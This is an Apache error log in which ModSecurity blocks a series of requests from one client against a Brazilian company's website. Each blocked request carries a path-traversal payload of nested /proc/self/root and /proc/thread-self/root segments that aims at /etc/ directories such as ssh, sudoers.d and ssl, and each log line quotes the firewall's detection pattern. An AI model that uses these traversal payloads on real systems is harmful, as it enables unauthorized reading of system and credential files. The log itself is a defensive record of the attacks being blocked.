[Tue Mar 17 14:16:26.390482 2026] [:error] [pid 28879:tid 140411599251200] [client 74.7.243.128:53678] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMalDN3UhJjLukrK-L4wAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:27.767320 2026] [:error] [pid 17965:tid 140411674785536] [client 74.7.243.128:53680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMa6t8Nd0UC_OcbVHLlwAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:29.318215 2026] [:error] [pid 17965:tid 140411574073088] [client 74.7.243.128:53688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMbat8Nd0UC_OcbVHLmgAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:30.767145 2026] [:error] [pid 29359:tid 140411557287680] [client 74.7.243.128:56898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMbqSy22zYCMGxsIldKwAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:32.130446 2026] [:error] [pid 6296:tid 140411548894976] [client 74.7.243.128:56906] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMcHIk7brgkOH-rIWMaAAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:33.696660 2026] [:error] [pid 28879:tid 140411708356352] [client 74.7.243.128:56916] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMcVDN3UhJjLukrK-L5AAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:35.239402 2026] [:error] [pid 6296:tid 140411699963648] [client 74.7.243.128:56926] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMc3Ik7brgkOH-rIWMaQAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:37.415549 2026] [:error] [pid 6296:tid 140411708356352] [client 74.7.243.128:56938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMdXIk7brgkOH-rIWMagAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:38.876013 2026] [:error] [pid 17965:tid 140411708356352] [client 74.7.243.128:56944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMdqt8Nd0UC_OcbVHLngAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:40.291344 2026] [:error] [pid 29151:tid 140411674785536] [client 74.7.243.128:36332] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMePPqhzTj3BvfDX-IhgAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:41.233830 2026] [proxy_fcgi:error] [pid 6296:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45318] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:16:41.774237 2026] [:error] [pid 17965:tid 140411590858496] [client 74.7.243.128:36338] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMeat8Nd0UC_OcbVHLnwAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:43.358952 2026] [:error] [pid 2598:tid 140411716749056] [client 74.7.243.128:36344] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMexj0p0SRWAqcjGF6OgAAAwM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:45.055601 2026] [:error] [pid 2598:tid 140411548894976] [client 74.7.243.128:36344] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMexj0p0SRWAqcjGF6OwAAAxc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:46.395244 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.243.128:36358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMfgeiSKl8TjouI-YaegAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:47.833167 2026] [:error] [pid 29359:tid 140411624429312] [client 74.7.243.128:36370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMf6Sy22zYCMGxsIldLwAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:49.223266 2026] [:error] [pid 7437:tid 140411641214720] [client 74.7.243.128:36374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMgQeiSKl8TjouI-YafwAAA8w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:50.644322 2026] [:error] [pid 6296:tid 140411649607424] [client 74.7.243.128:43166] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMgnIk7brgkOH-rIWMbAAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:52.286965 2026] [:error] [pid 17965:tid 140411683178240] [client 74.7.243.128:43172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMhKt8Nd0UC_OcbVHLoAAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:52.625021 2026] [:error] [pid 17965:tid 140411691570944] [client 74.7.243.128:43172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMhKt8Nd0UC_OcbVHLoQAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:53.883964 2026] [:error] [pid 30223:tid 140411540502272] [client 74.7.243.128:43184] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMhcT4LuLykoMK_89pgQAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:55.339011 2026] [:error] [pid 30223:tid 140411557287680] [client 74.7.243.128:43190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMh8T4LuLykoMK_89pgwAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 14:16:56.973130 2026] [:error] [pid 29359:tid 140411565680384] [client 74.7.243.128:43204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmMiKSy22zYCMGxsIldMAAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
